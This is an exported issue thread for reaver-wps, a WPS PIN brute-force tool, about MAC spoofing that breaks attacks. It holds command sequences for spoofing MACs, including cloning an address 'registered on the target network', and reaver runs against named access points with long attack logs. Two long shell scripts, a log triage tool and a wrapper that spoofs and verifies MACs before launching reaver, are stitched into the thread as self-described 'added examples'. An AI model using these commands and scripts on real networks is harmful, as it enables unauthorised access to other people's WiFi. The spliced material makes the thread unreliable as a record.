detrojones / reaver-wps

Automatically exported from code.google.com/p/reaver-wps

MAC address spoofing does not work properly #99

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
Pin attempts don't properly complete when spoofing the WiFi adapter's MAC 
address. This will hopefully be resolved once Reaver is integrated into the 
aircrack-ng tool suite using their injection libraries.

Original issue reported on code.google.com by cheff...@tacnetsol.com on 6 Jan 2012 at 4:39

GoogleCodeExporter commented 9 years ago
Issue 71 has been merged into this issue.

Original comment by cheff...@tacnetsol.com on 6 Jan 2012 at 4:42

GoogleCodeExporter commented 9 years ago
any ETA on when we could expect first release?
if you needed some beta testers I am willing to participate and do some testing 
for you

Original comment by jcdento...@gmail.com on 6 Jan 2012 at 9:18

GoogleCodeExporter commented 9 years ago
Beta testers are always welcome. :)

I'm working on cutting a 1.4 release, which will likely be the last release 
before porting the code into aircrack. Hopefully this should be done this 
weekend and work on the aircrack port will begin in earnest.

Original comment by cheff...@tacnetsol.com on 6 Jan 2012 at 9:28

GoogleCodeExporter commented 9 years ago
Haven't been able to confirm this but perhaps editing...

/etc/networking/interfaces.... with these lines might help spoofers.

auto lo
iface lo inet loopback
pre-up ifconfig wlan0 hw ether AA:BB:CC:DD:EE:FF

Connecting with a spoofed MAC was impossible before I tried this tweak.

This enables the connection. 

Don't know if it will integrate with reaver or not though. Perhaps someone can 
try it out ;)

Original comment by ObiDanKi...@googlemail.com on 9 Jan 2012 at 3:18

GoogleCodeExporter commented 9 years ago
correction* /etc/network/interfaces

Original comment by ObiDanKi...@googlemail.com on 9 Jan 2012 at 3:19

GoogleCodeExporter commented 9 years ago
I tried it.
I set the MAC address in /etc/network/interfaces and rebooted my machine.
it worked with aireplay-ng. I was able to associate with network I wanted 
without using -h switch. Also ifconfig wlan0 showed correctly spoofed MAC 
address.

on the other hand reaver associated but was complaining about out-of-order 
messages again as I mentioned in thread 71 before.

if anybody is interested here is the pcap file

Original comment by jcdento...@gmail.com on 9 Jan 2012 at 9:43

GoogleCodeExporter commented 9 years ago
OK, using the latest SVN code (r85) MAC spoofing is working properly for me. I 
have tested this against multiple access points from various vendors. Here are 
the commands I used:

reaver@reaver-vm:~/src$ sudo ifconfig wlan1 down
reaver@reaver-vm:~/src$ sudo ifconfig wlan1 hw ether 00:01:02:03:04:05
reaver@reaver-vm:~/src$ sudo ifconfig wlan1 up
reaver@reaver-vm:~/src$ ifconfig wlan1
wlan1     Link encap:Ethernet  HWaddr 00:01:02:03:04:05  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

reaver@reaver-vm:~/src$ sudo airmon-ng start wlan1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
706 NetworkManager
1341    wpa_supplicant
19515   dhclient

Interface   Chipset     Driver

wlan1       RTL8187     rtl8187 - [phy22]
                (monitor mode enabled on mon0)

reaver@reaver-vm:~/src$ sudo ./reaver -i mon0 -b C0:C1:C0:A5:73:F7 -vv 
--mac=00:01:02:03:04:05

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[?] Restore previous session? [n/Y] y
[+] Restored previous session
[+] Waiting for beacon from C0:C1:C0:A5:73:F7
[+] Switching mon0 to channel 11
[+] Associated with C0:C1:C0:A5:73:F7 (ESSID: Cisco27598)
[+] Trying pin 61635678
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending WSC NACK
[+] Trying pin 53815675
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending WSC NACK
[+] Trying pin 05795673
...

Original comment by cheff...@tacnetsol.com on 11 Jan 2012 at 5:56

GoogleCodeExporter commented 9 years ago
It works because you didn't change the MAC address of mon0, which got the 
original address from wlan1.
You have been using the original address from your card.

If you properly change the address of mon0 as well, reaver will stop working. 
Just tried with r88.

Original comment by aristide...@gmail.com on 12 Jan 2012 at 3:23

GoogleCodeExporter commented 9 years ago
aristidesfl: It definitely works, as verified by a wireshark capture. The MAC 
address used by Reaver is 00:01:02:03:04:05 and it is properly cycling through 
pins. In fact, it is only if I don't change wlan1's MAC address that Reaver 
fails to work with the --mac argument. 

You can also set the MAC address of mon0 to 00:01:02:03:04:05, but on my system 
this is unnecessary.

Original comment by cheff...@tacnetsol.com on 12 Jan 2012 at 4:09

GoogleCodeExporter commented 9 years ago
I did exactly the same steps as you did and this is the output

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Waiting for beacon from 00:23:69:48:5D:CE
[+] Switching mon0 to channel 11
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[+] Associated with 00:23:69:48:5D:CE (ESSID: @lien)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of 
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of 
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 86415675
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of 
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of 
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 74225675
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of 
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of 
the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous 
message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 58285671
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)
[!] WARNING: Failed to associate with 00:23:69:48:5D:CE (ESSID: @lien)

it tried some pins but why are there those M6 messages?

I will run it for a longer time and see if it cracks it eventually

any idea about that output?
thanks

Original comment by jcdento...@gmail.com on 12 Jan 2012 at 1:55

GoogleCodeExporter commented 9 years ago
@jc: Reaver is injecting and capturing packets fine (it can associate and start 
a WPS session), so this is not a MAC spoofing issue. This looks like the same 
problem that was just reported in issue 129. I'm working on a fix now. At any 
rate, MAC spoofing seems to be working.

Original comment by cheff...@tacnetsol.com on 12 Jan 2012 at 2:50
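The rule the maintainer applies in the comment above can be written down as a small log triage: if reaver associates and gets as far as the EAPOL/WPS messages, injection and the spoofed MAC are working, and an out-of-order M-message exchange points at the WPS state machine rather than at spoofing; if reaver never associates at all, the MAC and monitor-interface setup are the first suspects. The script below is an added example of that triage run over constructed `reaver -vv` output modelled on the logs in this thread. It is not code from the reaver project or from any commenter; the category names and the counting rules are my own assumptions, and the sample logs are constructed, not captured.

```shell
#!/bin/sh
# Added example (not reaver project code): classify a `reaver -vv` log into
# "no-association", "wps-out-of-order", "wps-transaction-failed",
# "pins-cycling" or "inconclusive", following the maintainer's reasoning in
# this thread. Category names and rules are assumptions of this example.

# Count lines on stdin containing a fixed string. grep -c exits 1 when the
# count is zero, which is a valid result here, not an error.
count() {
    grep -cF -- "$1" || true
}

# Read a reaver log on stdin and print exactly one category on stdout.
triage_reaver_log() {
    log=$(cat)
    assoc=$(printf '%s\n' "$log" | count '[+] Associated with')
    assoc_fail=$(printf '%s\n' "$log" | count 'Failed to associate')
    eapol=$(printf '%s\n' "$log" | count 'Sending EAPOL START')
    ooo=$(printf '%s\n' "$log" | count 'Out of order packet')
    txfail=$(printf '%s\n' "$log" | count 'WPS transaction failed')
    pins=$(printf '%s\n' "$log" | count 'Trying pin')

    if [ "$assoc" -eq 0 ] && [ "$assoc_fail" -gt 0 ]; then
        # Never associated: check the MAC actually in use on the monitor
        # interface before blaming the WPS code.
        echo "no-association"
    elif [ "$eapol" -gt 0 ] && [ "$ooo" -gt 0 ]; then
        # Associated and started a WPS session, then the M-message sequence
        # broke: injection works, so this is not a spoofing problem.
        echo "wps-out-of-order"
    elif [ "$txfail" -gt 0 ]; then
        echo "wps-transaction-failed"
    elif [ "$pins" -gt 1 ] && [ "$ooo" -eq 0 ]; then
        echo "pins-cycling"
    else
        echo "inconclusive"
    fi
}

# Constructed sample modelled on the logs above: associates, then the
# exchange goes out of order and stalls on M6.
sample_out_of_order() {
    cat <<'EOF'
[+] Waiting for beacon from 00:11:22:33:44:55
[+] Switching mon0 to channel 11
[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: test)
[+] Associated with 00:11:22:33:44:55 (ESSID: test)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
EOF
}

# Constructed sample: never gets past association.
sample_no_association() {
    cat <<'EOF'
[+] Waiting for beacon from 00:11:22:33:44:55
[+] Switching mon0 to channel 11
[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: test)
[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: test)
EOF
}

# Constructed sample: healthy run, pins cycle and each ends in a NACK.
sample_cycling() {
    cat <<'EOF'
[+] Associated with 00:11:22:33:44:55 (ESSID: test)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending M2 message
[+] Sending M4 message
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Sending M2 message
[+] Sending M4 message
[+] Sending WSC NACK
EOF
}

# `sh triage.sh demo` prints the category of each constructed sample;
# `reaver ... -vv | tee log; sh triage.sh < log` would not work directly,
# so for a real log run: . ./triage.sh; triage_reaver_log < log
case "${1:-}" in
    demo)
        for s in sample_out_of_order sample_no_association sample_cycling; do
            printf '%s: %s\n' "$s" "$("$s" | triage_reaver_log)"
        done ;;
esac
```

The classifier only looks at line counts, so it is a first-pass sort of a long log into "look at the interface and MAC" versus "look at the WPS exchange", not a diagnosis; the thread's own logs show both kinds of warning mixed together, and the ordering of the rules above encodes the maintainer's priority (a successful association outweighs the failed attempts before it).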

GoogleCodeExporter commented 9 years ago
hello,

there is definitely a difference for me depending on whether i use mac spoofing 
or not: if i do not use it everything works perfectly; if i do use it reaver 
has a lot of trouble associating with the AP. if i revert to the original/true 
mac everything works fine again.

when i use spoofing reaver cannot associate (or associates rarely) using the -m 
switch with the spoofed address, and without using the switch. if i use the -m 
switch with the true(original) mac reaver works properly even with the spoofing 
in place.

card is alfa awus036h
driver is rtl8187

distro is backtrack 5r1

thank you.

Original comment by damonswi...@gmail.com on 15 Jan 2012 at 7:53

GoogleCodeExporter commented 9 years ago
if I change the mac address with macchanger or reaver my system cannot 
associate. I have ath9k and backtrack 5r1. 

Changing the mac of wlan0 does not change the mac address of mon0 for my 
system. if I touch mon0 you can forget about reaver working.

Anybody have a solution?

Original comment by riker1...@gmail.com on 8 Feb 2012 at 7:02

GoogleCodeExporter commented 9 years ago
@jcdenton21@gmail.com
@damonswirled@gmail.com

Do the following:

1- Create an interface in monitor mode: airmon-ng start wlan0

2- Clone both interfaces, wlan0 and mon0, with a MAC registered on the target 
network.
Commands to use: ifconfig wlan0 down && macchanger -m 00:01:02:03:04:05 wlan0 
&& ifconfig wlan0 up #
ifconfig mon0 down && macchanger -m 00:01:02:03:04:05 mon0 && ifconfig mon0 up #

3- When using reaver 1.4, run only reaver; do not open any other program in the 
terminal, especially airodump-ng or any other monitoring program.

4- Run reaver 1.4

Ex: reaver -i mon0 -b MAC_AP -c CHANNEL_AP -e NAME_AP -vv

5- The better the signal quality between your computer and the AP, the faster 
the results.

Original comment by suzuk_1...@hotmail.com on 9 Feb 2012 at 12:35
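The five steps above, together with the maintainer's ifconfig/airmon-ng/reaver sequence earlier in the thread, as one script. This is an added example, not code from the reaver project or from any commenter. It assumes a Linux host with iproute2 (`ip`), airmon-ng and reaver on the PATH, root privileges, and that the interface names, the spoofed MAC and the target BSSID are placeholders supplied on the command line; the monitor interface name is whatever your airmon-ng creates (mon0 on the BackTrack-era aircrack-ng used in this thread, wlan0mon on newer releases). The point the script adds to the discussion is the check that was missing from the back-and-forth about wlan1 versus mon0: the monitor interface takes the card's MAC at the moment it is created, so the spoofed address is set on the managed interface first, set again on the monitor interface, and both are read back from sysfs before reaver is started with the matching --mac.

```shell
#!/bin/sh
# Added example (not reaver project code): spoof the MAC on the managed
# interface AND on the monitor interface, verify both, then run reaver with
# a matching --mac. Assumptions: Linux, iproute2, airmon-ng, reaver, root.
# Usage: sh spoof_and_run.sh spoof <wlan> <mon> <mac> <bssid>

SYSFS_NET="${SYSFS_NET:-/sys/class/net}"   # overridable so the checks can be tested

# MAC currently reported by the kernel for an interface, lower-cased.
mac_of() {
    tr 'A-F' 'a-f' < "$SYSFS_NET/$1/address"
}

# Six colon-separated hex octets; rejects typos before touching the card.
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# True if the interface reports exactly the address we intended to set.
mac_is() {
    [ "$(mac_of "$1")" = "$(printf '%s' "$2" | tr 'A-F' 'a-f')" ]
}

# True if two interfaces report the same address: the check that separates
# "wlan1 was spoofed" from "mon0 still carries the card's original MAC".
macs_match() {
    [ "$(mac_of "$1")" = "$(mac_of "$2")" ]
}

# The address can only be changed while the interface is down.
spoof_iface() {
    ip link set dev "$1" down
    ip link set dev "$1" address "$2"
    ip link set dev "$1" up
}

spoof_and_run() {
    wlan=$1
    mon=$2
    mac=$3
    bssid=$4
    valid_mac "$mac" || { echo "invalid MAC: $mac" >&2; return 1; }

    # 1. Spoof the managed interface first: a monitor interface created
    #    afterwards inherits this address.
    spoof_iface "$wlan" "$mac"

    # 2. Create the monitor interface.
    airmon-ng start "$wlan" >/dev/null

    # 3. Set the same address on the monitor interface explicitly; on some
    #    drivers it otherwise keeps the card's original address.
    spoof_iface "$mon" "$mac"

    # 4. Refuse to continue unless the monitor interface reports the spoofed
    #    MAC and, if the managed interface still exists, agrees with it.
    if ! mac_is "$mon" "$mac"; then
        echo "MAC mismatch: $mon reports $(mac_of "$mon"), wanted $mac" >&2
        return 1
    fi
    if [ -e "$SYSFS_NET/$wlan/address" ] && ! macs_match "$wlan" "$mon"; then
        echo "MAC mismatch: $wlan=$(mac_of "$wlan") $mon=$(mac_of "$mon")" >&2
        return 1
    fi

    # 5. The address reaver puts in its frames must equal the interface's.
    reaver -i "$mon" -b "$bssid" --mac="$mac" -vv
}

case "${1:-}" in
    spoof) shift; spoof_and_run "$@" ;;
esac
```

Run it as `sh spoof_and_run.sh spoof wlan1 mon0 00:01:02:03:04:05 C0:C1:C0:A5:73:F7`; nothing happens without the `spoof` word, so the file can also be sourced just for the checks. Reading the address back from `/sys/class/net/<iface>/address` rather than trusting the `ip link set` exit status matters because some drivers accept the command on a monitor-mode interface and silently keep the old address, which is exactly the situation the commenters above were arguing about.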

GoogleCodeExporter commented 9 years ago
the attack sudo aireplay-ng -1 6000 -o 1 -q 10 -e apEssid -a apMac -h myMac 
mon0 works fine and keeps me associated, while reaver gives me stuff like:

[+] Switching mon0 to channel 9
[+] Waiting for beacon from apMac
[!] WARNING: Failed to associate with apMac (ESSID: apEssid)
[+] Associated with apMac (ESSID: apEssid)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with apMac (ESSID: apEssid)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with apMac (ESSID: apEssid)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with apMac (ESSID: apEssid)
[!] WARNING: Failed to associate with apMac (ESSID: apEssid)
[+] Sending EAPOL START request

any ideas?

Original comment by cvo...@gmail.com on 13 Feb 2012 at 11:31

GoogleCodeExporter commented 9 years ago
This has happened to me. 
But unfortunately I do not know what to do to correct it.
I'll keep testing other command options to get it working again.

Original comment by suzuk_1...@hotmail.com on 14 Feb 2012 at 1:30